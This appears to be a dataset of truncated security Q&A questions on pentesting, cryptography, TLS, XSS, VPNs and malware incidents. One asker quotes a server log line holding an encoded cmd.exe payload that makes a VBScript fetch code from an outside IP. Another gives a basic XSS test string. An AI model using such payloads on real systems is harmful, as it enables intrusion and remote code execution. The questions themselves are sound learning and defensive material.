instruction
stringlengths
24
29.9k
How to approach penetration testing of a ATM OS that was upgraded from Windows XP to Windows 7? From what I gather, the testing flow should be as follows: Architectural Review Pentesting OS and Application Physical Audit For the current requirement, I am focusing on the second item. Typically, I'd scan the machine a...
I know this question asked so many times, but here I am again with it. I am working on an application in which I need to log-in users but the question is it is not a good Idea to send user credentials in plain text, as they can be crack by any network tool (don't know how so if you can tell this too then it will be ver...
I want to make wp-login.php and/or wp-admin accessible only from one country. If I want wp-login.php access only from USA then my approach from .htaccess is like below <Files wp-login.php> order deny,allow allow from 3.0.0.0/8 allow from 4.0.0.0/8 allow from 5.10.64.1/32 allow from 5.10.64.16/28 allow from 5.10.64.144/...
Can someone explain the major differences between a Brute force attack and a Dictionary attack. Does the term rainbow table has any relation with these?
Consider a protocol that allows clients to retrieve XML "forms" from a server. Forms are identified by a unique, randomly generated form ID that is embedded in the form. Clients fill out the form and submit it back to the server, communication uses relatively simple SOAP requests that contain the form in the SOAP body ...
I'm having a friendly debate with someone who thinks that a website can safely make public sensitive data about it's users as long as that data is hashed (don't ask why, it's a long and hypothetical story). My position is that this opens the data up to brute-force attacks at least and that no hash is truly unbreakable ...
Let's say my subkeys are compromised, but my master keypair is safe and secure, so I revoke the old subkeys and issue new ones. With encryption keys, the results are pretty clear: I can still decrypt both old and new messages encrypted with the key, but so can the key thief. But what about my signing keys? Will all thi...
I'm designing a HTTP service for an embedded device and wondering if the following security concept is good enough: SSL(Up to Version 3) is enabled by default, TLS is not by limitations of the platform. SSL Key strength is RSA 2048 All HTTP requests are redirected to HTTPS if SSL is enabled. HSTS header is sent by def...
I was checking the security of a server by running Nmap. Last time it gives me the following results, indicating that OS could not be fingerprinted: PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 5.2 23/tcp filtered telnet 25/tcp filtered smtp 80/tcp filtered ...
I know the use of keyloggers. What I wish to know is how a hacker can install the keylogger onto the victim's system? If it can be done by XSS then to where this keylogger is actually installed (I mean to the client system or browser or somewhere else)? And also how the response of keyboard press reaches the attacker?
If someone posts something on the internet using their phone's data connection, is it possible to track their location? For example, somehow link their IP address and figure out their location. Or even better, use the IP address, and find out which phone IMEI that post came from? Or something similar? i.e get their ...
At work our first level support uses a ticket management system that allows us to add extra functionality via VBScripts that the application invokes. First level support also receives quite a few requests for a certain issue that requires a very simple one line of SQL code to fix. We'd like to provide them with a sol...
One important use of proxy servers as I understand reading Wikipedia is to keep you anonymous from other servers by acting as a middle-man. If that is indeed the case, consider the following situation. You access a server without any proxy The server sends some cookies The cookies are saved on your computer You discon...
Google recently announced that in Android L encryption would be turned on by default: For over three years Android has offered encryption, and keys are not stored off of the device, so they cannot be shared with law enforcement. As part of our next Android release, encryption will be enabled by default out of t...
I have been working in a IT firm. I have access to some social sites. When I try to open site Links in mail (that are having http://), the websense prompts me that the access is blocked. However, when i try to open same site using https, it opens without blocking ?
Simple question, as the title said. I wondering if in an ideal world where rooting Android devices is not feasible mobile pen testing would be still possible or not. Most of the sensitive folders will be inaccessible, right?
Checking out IBM.com and Google.com: https://www.ssllabs.com/ssltest/analyze.html?d=ibm.com&s=172.230.109.66 Valid from Tue Sep 09 14:00:34 UTC 2014 https://www.ssllabs.com/ssltest/analyze.html?d=google.com&s=74.125.239.36 Valid from Wed Sep 10 13:31:45 UTC 2014 It's very uncommon that two very big corporations re-g...
I was wondering if there are any methods I'm unaware of that will allow an attacker to attempt to obtain WiFi access outside the physical range of the WiFi signal. When using net-stumbler or any other signal detection suites, we all know it'll report the following: BSSID/Mac,PWR,RXQ,Beacons,#data,#/s,CH,MB,ENC,Cipher,A...
If I were to allow users to host arbitrary PDF/RTF/DOC files on my server all under the same name, but with different query strings would there be anything to worry about? I've heard of PDF/RTF exploits, and I get that someone could perhaps host one of those on my server, but I mean it's not like they can access cookie...
Nowadays almost every website you want to register in; is asking you to create a complicated password...But why cant we use simple passwords? I am just wondering because in case of multiple wrong password attempts; many websites and devices nowadays are using lock out system which either locks you out permanently until...
Trying to learn about security I set up the most simple website on my localhost consisting of one html page that a apache server serves. I first started trying and appending the JS script that would be executed to the end of a URL: /index.html?message=<script>alert('XSS');</script> Browser encodes it to: /index.html?m...
I saw this video where news reporter is in public place, and some security expert demonstrates to her that even though she logged in at page which was using https that guy got password in his computer. How that might work, any ideas? I can't find video, but video didn't have any more details or words to go over beside...
I have started signing my mail with PGP, and it attaches the file signature.asc to my messages to verify that I sent them with content, as you'd expect, like this: -----BEGIN PGP SIGNATURE----- iQIcBAEBCAAGBQJUHRK/AAoJEMJWYKCGVRRfo+8QAJ+of0o30gPA3+OAWK/03JZN STWaF+DQIsxFX6vuLgl10b8D1SyH78vMfMBy785+P/Do/hAzk2g+cBNz0q4o...
I am hearing that the SHA1 Deprecation notices from MS/CHROME only apply to certs that are a part of a public trusted root program. This makes one believe that IE will have new logic built in to allow it to distinguish certs issued by internal CA's as opposed to certs issued by Public CA's and NOT flag sites as unsafe ...
I tried scanning websites for vulnerabilities and found most of them are with low risk x-frame content and "nosniff" what is it exactly?
Background In response to a system design concept, a question was posed: How do you achieve electronic voting, anonymity, and verifiability at the same time? I was informed that most experts in the field believe it to be practically impossible (see Jonker et al.). My understanding was that this was solved through sys...
Reading up upon security on web applications I did not found that much info on TCP-IP and in particular HTTP/UDP protocol violation / anomaly attacks. My question: What is the general mechanism of such attack? As I understand an invalid HTTP/UDP request is sent to the server that it then tries to read an execute - can ...
We have a request to encrypt customer personal data (e-mail, address etc.) We use MySQL which does not have any TDE like MS SQL or Oracle. So along with encrypting data we need to preserve functionality for querying this data directly (not LIKE). So something like select * from person where email='blah@blah.com'. The...
I examined a few randomly generated private keys generated by Gnu PG, and found a lot of redundancy. It is enclosed by -----BEGIN PGP PRIVATE KEY BLOCK----- and -----END PGP PRIVATE KEY BLOCK----- There is a CRC checksum at the end (e.g., =WXYZ) All RSA keys that I generated start with "lQ" I tried removing the check...
I have two independent authentication methods A and B with entropy a and b respectively. say compromise of A does not provide any information on B. Is entropy of two-factor authentication of A and B is a+b?
Overview of my question I want to create a secure Window's system without the use of an Anti-Virus program. Whilst I know there are many on-demand and live-scanning anti-virus programs readily available, I feel as though they are not the best method for me to engage in. I want to explore my other methods. Current Idea(...
I am not much experienced with brute force attacks but I was wondering Suppose, you have a website www.example.com and you want to do brute force attack on that login form but that login form is protected by anti-CSRF token. Is it possible to do brute force password on the CSRF protected form because a unique key creat...
We are building a portal where users can upload few materials. we have been successful in using the command lines of linux to convert doc,ppts to pdf directly through the server but we are not able to encrypt those files from printing, editing and copying. Please provide us with some solution so that we can do it thro...
My Linux (Ubuntu 12.04) password suddenly changed last night and I'm not sure if this is an attack or just a hardware/user error. This is on a personal/non-server box. Several strange events led up to it, enumerated below: While browsing web pages, I can't seem to scroll down. My right hand was on my mouse, left eatin...
Digging through articles, one often finds recommendations such as "Use the default key type/size X", whereas an article written a few years later will write "Key type/size X has been found to be vulnerable; instead use the other key type Y". Or one often comes across "make sure to change to stronger hash preferences" [...
When I push/pull repos on GitHub over SSH, sometimes there will a message about unidentified server and asks if I want to trust and add it to known_hosts. Apparently this is because GitHub has multiple IPs. What I don't understand is why SSH needs to record the hostname in known_hosts. When I use my private key to auth...
I signed my binary with a certificate issued by GoDaddy. It seems that myself and everyone I could get to test it for me confirms that it is indeed signed (much like signtool verify) However, when I test it on my VMs (XP, Vista, 7) they appear unsigned. I signed the executables on Windows 8.1 What's going on? Do the VM...
I can check that an Ubuntu iso file is indeed untampered using the public keys already present and trusted in my Ubuntu system. Now I want to switch from Ubuntu to Arch and I wonder how I can start trusting that the image downloaded for setting up Arch has not been tampered? I know that I can use cryptographic hash fun...
I have downloaded an image that someone has uploaded to my website with a public upload form. My intention was to copy the file in a virtual machine and see the image from there; unfortunately, on ubuntu there is something called "thumbnail"... So, thumbnail was created and I can see the image in the file explorer, but...
I was recently figuring out thing in a web application and found that the URL is reflected among the source of the page, which make it bit obvious for XSS, but the input from URL which is reflected on source is assigned inside a <script> tag. URL: http://www.xyz.com/back?majorID=usdfg&Action=Themesdig&pbPage=vulnerable...
Often when I run a .exe file in Windows, a small box pops up that shows that file is from a verified publisher (e.g. Microsoft) or in other case, unknown publisher. I know public key encryption can guarantee the integrity of a file. The questions here are: Does Windows calculate the whole content of the file? Because ...
Is it possible to secure a Single Page Application (SPA) served from a CDN that communicates with a REST API, assuming the following: The front end communicates with a backend REST API using a token once the user has been authenticated The front end is only served via CDN with a wildcard HTTPS cert How do you avoid C...
I am on OSX 10.9.2, please note I have included several URLs in my post, this is not spam this is due to the nature of the malware. I have just discovered I have malware on my computer after noticing that my network traffic became incredibly slow and many of the requests timed out after the first request in Safari, Fir...
I am trying to design an algorithm for publicly sharing authenticated messages. Obviously, asymmetric public/private key schemes do this, but I want to avoid the requirement that users have to keep track of a lengthy asymmetric key. Instead, I only want users to keep track of a password that can be hashed to make the...
Last thing we want to do is provoke an attacker and offer them challenges or puzzles indirectly to give them a flag to stay and continue to hack rather than move on to other hosts. If possible, I do not wish to let the attackers know that my iptables rules have TARPIT enabled for certain ports. If I do not know that T...
I have just started studying for CEH exam v8 and I am trying to get the core of so called hacking phases. I could not totally understand the practical difference between the first two phases. In recon a pentester should get all available info from the target. As far as I can see it would be expected he uses tools like ...
I assume that the best way to handle passwords for a website is I create a hash of the password and save that hash in my database. Then when someone tries to login, I do a hash of the password they entered and compare. Is this correct? And, is there sample code anywhere showing how to do this in C#? And should I add so...
I've inherited the code-base for a legacy mobile app (both the native Android and native iOS version) and am running a security review on it, a few things stood out to me. The app allows a user to store their credit card details on the phone for future purchases (note: The CSN number is explicitly not stored as a secur...
If someone were to listen to a SHOUTcast server through Tor using VLC (not just downloading the M3U playlist through the Tor browser, of course, but while running Tails), would it put their security in jeopardy? I'd think it would be a pretty straightforward connection, just like downloading any random MP3 files and th...
I did a small test on Chrome (V37) today. I created a small page and loaded it to the browser: <!DOCTYPE html> <html> <head> <title>Untitled Document</title> </head> <body> <p>Normal page</p> <iframe src="https://security.stackexchange.com/" /> </body> </html> Inspecting the console I found this error mess...
Many of you have heard about instagram flaw that facebook has not fixed yet, The flaw allows the attacker to hijack the session by sniffing the session cookie on Instagram iOS app since it does not encrypt the communication, I have been looking for a way to protect my account - say that I am famous and hackers target...
When posting questions, it is often quite useful to include debug output. However, it sometimes include the MAC address of my laptop, router, or both. What are the possible dangers of releasing these mac addresses publicly?
What is a proper or, if possible to tell, the best way to store configuration in matters of security? So far I can tell that a database with very restricted access is a good way, but please let's exclude the database for the moment. I'm talking about things like encrypted properties files. As this is already a suggesti...
I have been seeing few rules with -m state --state NEW, ESTABLISHED, RELATED. First I thought that was pointless as it was contemplating the three possible states, so there was no need to define -m state --state NEW, ESTABLISHED, RELATED at all. However, seeking for information I found that there is a fourth state: INV...
I saw a cipher suite EXP-EDH-RSA-DES-CBC-SHA, EXP stands for export, How do I explain the "export"? What is the different between "EXP-EDH-RSA-DES-CBC-SHA" and "EDH-RSA-DES-CBC-SHA"?
We have recently started a project with a service provider who is a little old fashioned in their ways. They provide a product but don't market it particularly well, so we (as users of the product) have become involved in selling/marketing/improving this product. The service provider administers this product, while we ...
I know very well about the classic XSS vulnerabilities such as reflected & stored XSS. I have read a lot about DOM and DOM based XSS vulnerabilities. I came to an inference that there is nothing to do from the server side to prevent DOM based XSS since the attack vectors are never passed to the server side. Then how ca...
Regarding the SHA 1 deprecation, I found this information here: http://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2880823-recommendation-to-discontinue-use-of-sha-1.aspx I know that the 2^77 and 2^61 deal with time complexities, but are these specific attacks against the full 80 rounds of SHA1 or do t...
I see some SaaS require to import "App Secret" into your application also with "Application Key". I understand the "Applicaton Key", but can not understand the "App Secret". Here is why: I can decompile the application and get app secret easily. If you are encrypting the traffic between you and server with it, and you...
How safe are signed git tags? Especially because git uses SHA-1. There is contradictory information around. So if one verifies a git tag (git tag -v tagname), then checksouts the tag, and checks that git status reports no untracked/modified files, without further manually auditing the code, how secure is this actually?...
A friend of mine wants to use a VPN on his school's Wi-Fi becuase they've blocked many applications such as Skype, etc. My question is, if he uses a VPN (with iOS 7) will the system administrators be able to see he's using a VPN and eventually disable it?
I was discussing the use of tor with a friend, and he happened to suggest a way to remain secure when using applications on the terminal (Lynx, Nmap etc.) His suggestion was this: ssh-keygen -b 4096 ssh -D 8008 user@127.0.0.1 And also add Socks4Proxy 127.0.0.1:8008 to /etc/tor/torrc I understand what the SSH commands ...
I've been told that when integrating with a 3rd party payment gateway, the other website's window should not be opened in an iFrame or a separate window - that the current application window itself should redirect to the payment gateway. Where will I find documentation supporting this claim? A new page would be total...
I have found that I can decrypt SSL traffic in Wireshark with the server's private key. Why isn't the client's private key enough to decrypt SSL traffic?
I don't really understand how smart cards work. Do they sign or encrypt themselves (where the computer provides data to it to sign) or do they provide a computer with the private certificate when I enter my PIN?
OPEN URL REDIRECTION as per in my opinion can be proved very dangerous by crafting attacks such as phishing. But it seems like google thinks it as a very low level bug and does not provide any monetary reward for this. So my question comes here into play what the worst case scenario can happen with open url redirection...
Does encrypting a value in the web.config file actually provide any real protection? It seems to me that any web app can read that setting. Yes that's more work than just reading the web.config file, but it's not a big difference if you have control of the system.
This system is for a personal file upload and sharing web application made with PHP. When a user logs into the application, it has the option to "stay logged in" after closing and reopening their browser, just like most other web applications. What this actually does is that it sets an HTTP cookie, named auth, with an ...
Let say: application.house.com apache tomcat : physical server email.house.com apache tomcat : virtual finance.house.com Oracle Wallet Manager : physical server document.house.com apache httpd : physical server room.house.com IIS 7 : windows : physical se...
I'm building an application that needs to store a public/private key pair generated by the user. What's the best way to do this? Encrypt the private key in the db with some application-generated secret? Encrypt the private key with some user-specific secret?
I understand the diagram up till the point where Bob and Alice do a "Public transport" of their respective mixture. I am wondering how do Bob and Alice know what secret colour to add ( circled picture ) to get the Common secret
do l2tp protocol is secure enough to use in unsafe home network ? protection from man in the middle ? i having a problems install openvpn in linux you think following that guide will offer me security in unsafe home network ? https://support.hidemyass.com/hc/en-us/articles/202721556-L2TP-Setup-on-Fedora l2tp 128bit [ M...
I was registering on an e-commerce website (no, I'm not gonna name it), when, due to my pentest nature, I captured the GET request for resending a confirmation email. Kinda like: http://www.example.com/resend?email=someguy%40domain.com What I noticed was, when I entered a registered email (on the website, my friend's a...
I have a 2gig telstra prepaid wifi. The VPN I am using is unlimited. when I download it comes off both my VPN and ISP. Is it possible to set it up so it only uses my VPN download ratio.. Any suggestions?
I want to know the basic differences between XSS and XSF
It has been seen that security testers input either ' or ; into the application entry points to test for SQL injection. Why are these characters used?
I have a Windows 8.1 machine that seems to be acting weird and getting slow day by day. I believe that it may be a victim of Remote access Trojan(RAT) infection. How do I listen to ports on my PC and how do I close them if necessary ? How do I deduce that a port is associated with a RAT and how do I close it ? Will ne...
I am using VirtualBox: where the guest is an Arch ISO and the host Windows/Cygwin or a generic Linux. For sharing host folders, VB native shared folders is not an option (since the setup requires often a reboot of the ISO). I am turning to NFS, where the VB host is the server, which does not require a heavy setup on ...
I am looking for network interception tools, which involves sniffing external networks... this is regards to a forensic project.. Any help would be appreciated!
I have a need to scp a bunch of files from a production box to my development environment. I am a developer and have limited read access to the production machines. Instead of entering password for each file, I wanted to create a keypair in production and store the public key in authorized_keys on my dev machine. The ...
I am planning for GPEN certification, although i have been extensively involved in penetration projects, still looking at the topics it seems a bit difficult.. what could be good study guide for preparation?
Let's say you want to send the same GPG/OpenPGP encrypted message to 50+ recipients. Assuming everyone you send to is trusted, and there is no risk of any recipient leaking their secret key, is sending a single message to multiple recipients less secure from an "ability to break" perspective? Since GPG uses hybrid encr...
The run down: Windows Server A (from here on referred to as 'the server') exists on the corporate network (ref as Corporate). A separate physical network exists for the Telecommunications Department - we'll call it Telecomms Network. A Telecommunication "Specialist" from another department is trying to convince manage...
I have never worked in big organization and I wonder if any of them considers food or drinks a security threat. More than one movie showed the scenario of an operator who accidentally spills tea on the control panel and cause the train to get out of control or some missiles to get launched.
I'm looking at some malware PCAPs, e.g. http://malware-traffic-analysis.net/2014/05/27/index.html . One of the things I've been seeing frequently is requests to alexa top million sites (e.g. yandex, google, yahoo). I've always considered this to be a connection checking technique. However, recently I've been thinking...
I'm sure you've all heard of two-factor/multi-factor authentication. Basically it comes down to these factors: Knowledge - something you know (e.g. password, PIN, pattern) Possession - something you have (e.g. mobile phone, credit card, key) Existence - something you are (e.g. fingerprint) My question is: Does a four...
Recently I logged into my Facebook account and then noticed that my caps lock was on. So I tried to log in again with and without capslock on. I got in both times. Then I tried to log in with the first letter of my password in uppercase and the rest in lowercase. Again, I got in. How is this even possible? Does Faceboo...
Usual password verification schemes stores a salted password hash and the salt. If the hash is good and computational costly, it is considered secure. However an alternate version (used in Microsoft Office and probably other places) generates N random bytes (eg 16 bytes) and a M byte hash of the N bytes (say an additio...
Is there a way to ensure that an HTTP request to my REST server is coming from my application? I'm guessing no because whatever I do on the client side, as people have access to that code, they can figure out what I'm doing, and do the same. Is it a valid approach to always use HTTPS (to stop prying eyes) and then requ...
I'm currently using AES 256 for the encryption of my web application and the security policy context specifies that the encryption key must be replaced once every few months. When that happens what handling needs to be done in particular? What I read online suggests that I'll need to decrypt the existing encrypted dat...
- - [22/Sep/2014:13:54:24 -0600] "GET /?search==%00{.exec|cmd.exe +%2Fc +echo%3E22222.vbs +dim +wait%2Cquit%2Cout%3ASet +xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet +WshShell +%3D+Wscript.CreateObject%28%22WScript.Shell%22%29 +%3ADS%3DArray%28%22 123.108.109.100 %22%2C%22 123.108.109.100 %3A53%22%2C%22 123.1...
I've found some messages like this one, in my nginx error.log. open() "[my-domain]/**iptac-***[a long long string]*/http:/[my-domain]/" failed (2: No such file or directory), client: , server: , request: "GET **/iptac-***[a long long string]* I've changed some parts of the message for privacy, but the "long long strin...
I'm trying to understand one aspect of a secure shuffle using Fisher-Yates. For reference, here is Fisher-Yates to shuffle an array x of n elements (numbered from 0 to n-1) (from Securing a Shuffle Algorithm): for all i from 0 to n-1 let j = rnd(n - i) + i swap x[i] with x[j] I don't quite understand what Tom ...
Suppose I work for a bank and am asked to write an NFC payment app for the iPhone 6 or Android but not use Apple Pay. To simply send the credit card details to the reader via NFC. Now assume I'm not storing the credit card details using a one-one hash that the credit card company at the other end will match to validat...
I have my own website and I created a subdomain that points to my home IP address. It is useful for personal things like entering my domain for wake-on-lan and letting my friends enter it to join multiplayer games I host from time to time. But is pointing a subdomain to my home safe?
Today I observed some strange behavior with an IP address on our network. Our main switch was reporting that it's MAC address kept changing, a couple times every minute. We pinged the IP repeatedly and cleared the ARP cache and with every clearing of the ARP we saw a new MAC entry. We tracked it for some time and it se...
I am trying my level best to solve this issue i am totally not able to create a XSS i still thinks it to be a vulnerability and i think it is exploitable. I am frustrated around it for 8 days . Please help me solve this issue and don't mark it as duplicate (because it is the same question) and only one great person has...
I recently came across some entries in nginx's access logs that resemble the following: ##.##.##.## - - [24/Sep/2014:01:21:51 -0400] "GET /767/browser-wars-side-show-ho w-natty-handles-the-load/+++++++++[+%C0%EA%F2%E8%E2%E0%F6%E8%FF+]+Result:+%E8%F1 %EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22azazalolxd%22;+%E...
The scene: s_server using RSA certificate. s_client using ECC-ECDSA certificate. Client authentication is required (option -Verify set on s_server) Cipher-suite selected after handshake is ECDHE-RSA-AES256-GCM-SHA384. So, i don't completely understand how the type of certificate (RSA-DSA) affects the cipher-suite se...
Paypal has a new payment option called "Bank Account" which says: Enter your online banking ID + password QUESTION: To me it sounds unsafe (ie: sends my password to a third-party organization like Paypal), but does there actually exist any security mechanism/protocol that they could be using to make this operation s...